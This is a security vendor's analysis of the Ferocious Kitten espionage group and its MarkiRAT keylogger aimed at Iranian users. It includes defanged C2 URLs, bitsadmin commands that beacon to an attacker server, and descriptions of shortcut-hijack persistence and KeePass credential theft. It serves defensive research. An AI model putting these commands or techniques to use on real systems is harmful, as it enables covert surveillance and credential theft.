Ferocious Kitten: 6 years of covert surveillance in Iran

Ferocious Kitten is an APT group that since at least 2015 has been targeting Persian-speaking individuals who appear to be based in Iran. Although it has been active for a long time, the group has mostly operated under the radar and has not been covered by security researchers to the best of our knowledge. It is only recently that it drew attention when a lure document was uploaded to VirusTotal and went public thanks to researchers on Twitter. Since then, one of its implants has been analyzed by a Chinese threat intelligence firm.

We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the aforementioned document is dubbed ‘MarkiRAT’ and used to record keystrokes, clipboard content, provide file download and upload capabilities as well as the ability to execute arbitrary commands on the victim machine. We were able to trace the implant back to at least 2015, where it also had variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method.

Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten. In this report we aim to provide more details on these findings and our own analysis on the mechanics of the MarkiRAT malware.

Background

Two suspicious documents that were uploaded to VirusTotal in July 2020 and March 2021, and which seem to be operated by the same attackers, caught our attention. One of the documents is called “همبستگی عاشقانه با عاشقان آزادی2.doc” (translates from Persian as “Romantic Solidarity With Lovers of Freedom2.doc”) and contains malicious macros that are accompanied by an odd decoy message attempting to convince the victim to enable its content:

Decoy content in one of the malicious documents

After enabling their content, both documents drop malicious executables to the infected system and display messages against the regime in Iran, such as the following (translated from Persian):

I am Hussein Jafari

I was a prisoner of the regime during 1363-64.
Add my name to the prisoners' statement of Iraj Mesdaghi about the bloodthirsty mercenary.
Please use the nickname Jafar for my own safety and my family.

Hussein Jafari
July 1399

Messages that appear in the documents after enabling their content

The macros in the documents convert an embedded executable from hexadecimal and write it to the “Public” folder as “update.exe”. Afterwards, the payload gets copied to the “Startup” directory under the name “svehost.exe” to ensure it automatically runs when the system is started:

Macros copying the payload to the startup folder

In addition to the above documents, we managed to find malicious executables that were used by the attackers and date back to as early as 2015. It seems that in the past the attackers delivered executables directly to the victims and only recently introduced weaponized documents as the initial infection vector.

Moreover, the attackers used the “right-to-left override” technique that causes parts of the executables’ names to be reversed, making them appear to have a different extension such as .jpg or .mp4, rather than their real one. When run, the executables display decoy content to the victims, with some presenting images of protests against the Iranian regime and its institutions, or videos from resistance camps.

Decoy image found within one of the malicious executables showing a protest against the central bank of Iran

Analysis of MarkiRAT

The aforementioned infection vectors are used to deploy unique malware we dubbed MarkiRat. While we were able to identify several versions of it, it is evident that the core of the malware remained the same. The internal name of the implant, as becomes apparent from PDB paths in the executable binaries, is ‘mklg’. This name perhaps stands for ‘Mark KeyLogGer’, where ‘Mark’ is an internal HTML tag used by the implant.

During its activity, we could see that the authors changed the compilation environment and incorporated new libraries to hinder both manual and automatic static analysis. From 2015 to February 2018, the malware was compiled with Visual Studio 2013 and 2015, whereas in February 2018, the developers moved to Visual Studio 2017 and embedded the malware’s logic within Microsoft Foundation Class (MFC) classes. In accordance with these changes, the internal name was also modified to ‘mfcmklg.pdb’.

The MarkiRAT implant starts by performing the following actions:

• Creates a mutex named “Global\{2194ABA1-BFFA-4e6b-8C26-D1BB20190312}” during initialization of an MFC CWnd class instance.
• Expands the environment variable ‘PUBLIC’ to be used as the base directory for the malware’s work repository, which is located under ‘AppdataWindows’.
• Checks the running processes on the victim machine to look for ‘exe’ (Kaspersky) or ‘bdagent.exe’ (Bitdefender). If one of them is found it will be indicated using a numeric value passed to the server via a parameter named ‘k’, using a GET request to the URL as outlined below. The presence of a security solution from Kaspersky will be denoted with the value ‘1’ and Bitdefender with the value ‘3’. However, no change in the malware’s behavior was observed based on this check.

  hxxp://C2/ech/client.php?u=[computername]_[username]&k=[AV_value]

• Creates a log file named ‘nfo’ with information as shown below (time of the implant’s initiation and its execution path).

  <br><mark>Hello: Fri Mar  5 18:56:27 2021
  </mark><br><mark>C:Users[username]AppDataLocalTempsample.exe</mark>

• Initiates communication with the C2 server by issuing an HTTP POST request, registering the victim as a new client using the URL scheme and body content specified below:

  POST hxxp://[C2 address]/i.php?u=[computername]_[username]&i=[IP address]
  
  p=<br><b>Windows Title1</b><br><br><b>Windows Title2</b><br>

  The expected server response acknowledging registration is:

  3
  LOK
  0

• Issues an additional beacon to the C2 server by using Microsoft’s BITS administration utility with the following commands:

  > bitsadmin /cancel pdj
  > bitsadmin /create pdj
  > bitsadmin /SetPriority pdj HIGH
  > bitsadmin /addfile pdj "hxxp://[C2 address]/i.php?u=[computername]-[username]&i=[proxy ip]" %PUBLIC%AppDataLibsp.b
  > bitsadmin /resume pdj

  The purpose of this part is not entirely clear, but we think it’s probably used to bypass a potential proxy server in the victim network, thus providing the C2 with the victim’s IP.

• Starts a keylogger with all keystrokes and clipboard content being stored locally in the aforementioned .nfo file, exfiltrated to the C2 using the same URL described previously in the POST request. It is interesting to note that an active Keepass (password manager) process gets killed before starting the keylogger. This is likely intended to force the user to restart the program and enter a master password that is then stolen via the keylogger.

Following these actions, the malware initiates a thread to constantly beacon the C2, waiting to receive commands and executing them accordingly. The beacon request is issued with the following request:

GET hxxp://[C2 address]/ech/echo.php?req=rr&u=[computername]_[username]

The expected response carries a command to be executed and needs to be formatted as JSON. It is then parsed using the open-source library JsonCPP, where the following commands are supported:

Any other command that doesn’t fit the above patterns will be forwarded and processed as an argument to ‘cmd.exe /c’ and run via the ‘ShellExecuteW’ API.  Additionally, each beacon is accompanied with a screenshot that is initially saved as ‘scr.jpg’ in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the ‘uploadsf’ command.

Telegram hijacking variant

One of the discovered MarkiRAT variants was used to intercept the execution of Telegram and launch the malware along with it. The core of the malware is the same as described previously for MarkiRAT, with the exception of functions in charge of the malware’s deployment on the victim machine. These conduct the following actions:

• Check for the Telegram installation directory by enumerating the files on disk and looking for the ‘exe’ binary in a directory named ‘tdata’ (internal repository used by the Telegram desktop utility).
• If the file exists, the malware copies itself to the same directory as ‘exe’, while preserving the icon of the Telegram application.
• Modify the shortcut that launches Telegram by replacing its path to the one corresponding to ‘exe’, as outlined below.

Telegram shortcut launching the payload along with the legitimate executable

Following these actions, if ‘data.exe’ is executed as a result of initiating Telegram, the usual deployment logic is skipped and the malware directly executes the real Telegram application along with the malicious MarkiRAT payload.

Chrome hijacking variant

Another interesting variant targets the Chrome browser and can be split into two components going by the following internal names (as evident from the PDB paths left in them):

• mklgsecondary.pdb
• mklgchrome.pdb

The first stage logic is performed by ‘mklgsecondary’ which serves the purpose of downloading a file named ‘chrome.txt’ from a C2 server using the BITS utility. The downloader modifies the Chrome shortcut using the same method previously described for the Telegram variant. The downloaded PE file (‘chrome.txt’/’mklgchrome’) gets executed each time the user starts Chrome, thereby running the real Chrome application as well as executing the MarkiRAT payload. As is the case with variants targeting Telegram installations, the usual initialization routine is skipped.

Downloader

One unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned MarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, getting executed upon initiation of an MFC dialog object during runtime. Notably, it contains the PDB path ‘D:mklgsmfcdownlReleasemfcdownl.pdb’, resembling those used by the malware authors in all other variants, and contacts the C2 server behind the domain ‘microsoft.com-view[.]space’, which was also observed in other recent MarkiRAT samples. The use of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs.

The execution flow of this component is mostly straight-forward and consists of the following actions:

• The malware checks for command line arguments containing a URL path to the C2 server and the file name used for the downloaded executable. If less than three arguments are passed, the program terminates.
• The file is downloaded from the hardcoded domain ‘com-view[.]space’ using the WinHttp API, passing the second argument as the server path from which the file will be downloaded and employing the third argument for the retrieved payload’s filename to be saved in the %PUBLIC% directory.
• The malware generates a numeric value based on the current system time and uses it to rename the downloaded binary (i.e., it will be stored as <numeric_value>.exe in the %PUBLIC% directory).
• Finally, the downloaded payload is executed by resolving the path of exe and passing the newly generated path of the downloaded binary as an argument. The resulting command line is initiated as a new process using the ‘CreateProcessW’ API function.

Interestingly, the sample contains hardcoded strings in Arabic taken from the Quran that appear at the beginning of the function with the malware’s business logic. The second verse means “And We shall raise a barrier in front of them and a barrier behind them, and cover them over so that they will not be able to see.” It is often used when one is being chased by an enemy, in the hope that they are overlooked.

Verses from the Quran in the malware

Evidence of Android implants

Apart from the PE malware, we were able to identify several URLs in our telemetry that suggest there were Android applications hosted on the C2 infrastructure:

• hxxp://updatei[.]com/ddd/classes.dex
• hxxp://updatei[.]com/hr.apk

Unfortunately, we were unable to obtain the underlying samples and can therefore only assume that these are malicious implants targeted at mobile users, developed and leveraged by the threat actor. That said, similar activity aimed at targets in Iran suggests that actors engaged in this type of pursuit may very well be operating several campaigns, each focusing on a different technical platform with categorized targeting based on victim profiles. An example of this was mentioned in our recent APT trends report and discussed more thoroughly in a private report delivered to customers of our APT reporting service, where we identified the DomesticKitten threat actor spreading both Windows- and Android-based malware against Persian-speaking users within the same timeframe.

Who are the targets?

The attack appears to be mainly targeting Iranian victims. In addition to the mostly Persian file names, some of the malicious websites used subdomains impersonating popular services in Iran to appear legitimate. For example, “aparat.com-view[.]space” was mimicking Aparat, an Iranian video sharing service, while “khabarfarsi.com-view[.]org” was mimicking an Iranian news website.

In addition to the Telegram payload variant analyzed above, one of the malicious samples discovered was a backdoored version of Psiphon, an open-source VPN tool often used to bypass internet censorship. The targeting of Psiphon and Telegram, both of which are quite popular services in Iran, underlines the fact that the payloads were developed with the purpose of targeting Iranian users in mind. Moreover, the decoy content displayed by the malicious files often made use of political themes and involved images or videos of resistance bases or strikes against the Iranian regime, suggesting the attack is aimed at potential supporters of such movements within the country.

A stronger indicator for the aforementioned victim profile can be observed in the code itself, particularly in the keylogger’s logic. Before writing a keystroke to the log, the malware obtains the current locale identifier using the ‘GetKeyboardLayout’ API. The retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429. This value corresponds to the Persian language ID, thereby solidifying the assessment that the targeted users are Persian speaking.

Locale check before writing a keystroke to a file, showing hardcoded values corresponding to the Persian language ID (0x0429)

The Kitten connection

During our analysis we found similarities between Ferocious Kitten and other threat groups, namely Domestic Kitten and Rampant Kitten, both in terms of their TTPs and victims. Like Domestic Kitten, Ferocious Kitten has used the same set of C2 servers over long periods of time and shows the same URL patterns for C2 communication using only three letters such as “updatei[.]com/fff/” or “updatei[.]com/fil/”.

Just like Rampant Kitten, both threat groups attempted to gather information from the Keepass password manager and changed the execution flow of Telegram Desktop to ensure the persistence of their malware. And although we were unable to find solid connections between the codebase or infrastructure of these groups, the various campaigns operated by the three threat groups share a distinct targeting scheme and go after Iranian victims.

The WHOIS information of the malicious domains showed that Ferocious Kitten used Iranian hosting services such as Pardaz IT or Farasat IT Group. Furthermore, some of the PDBs in the malicious samples from 2017 mentioned the name “Ghabli” (e.g., ‘D:ghabliProjectsmklgtelegramReleasemklgtelegram.pdb’), which appears to be a Persian surname.

PDB path from a Ferocious Kitten sample

An interesting thing to note is that one of the domains we are monitoring for related activity, ‘updatei[.]com’, appeared in a Facebook page called “Iranian Association of Combatant Programmers” (translated from Persian). The attackers registered this domain in February 2015, and the post was published in March of the same year. The URL mentioned in the post was meant to download an archive called “cports.rar” that supposedly contained the “cports.exe” tool; unfortunately, we couldn’t examine the archive’s contents because the website was down at the time of analysis.

Translated post from Facebook page mentioning one of the malicious domains

Conclusions

Ferocious Kitten is an example of an actor that operates in a wider ecosystem intended to track individuals in Iran. Such threat groups do not appear to be covered that often and can therefore get away with casually reusing infrastructure and toolsets without worrying about them being taken down or flagged by security solutions.

Additionally, such groups are known to target various platforms (most notably Windows and Android) and often share TTPs, as indicated in this report. The latter in particular may suggest that the underlying actors may be interconnected, sharing developers or operating under a mutual supervisor. While not technically impressive, it’s interesting that the actor created specialized variants to be launched alongside popular programs, namely Chrome and Telegram. The technical sophistication of the toolset doesn’t appear to be a high priority for the attackers, who seem to be more intent on expanding their arsenal.

IOCs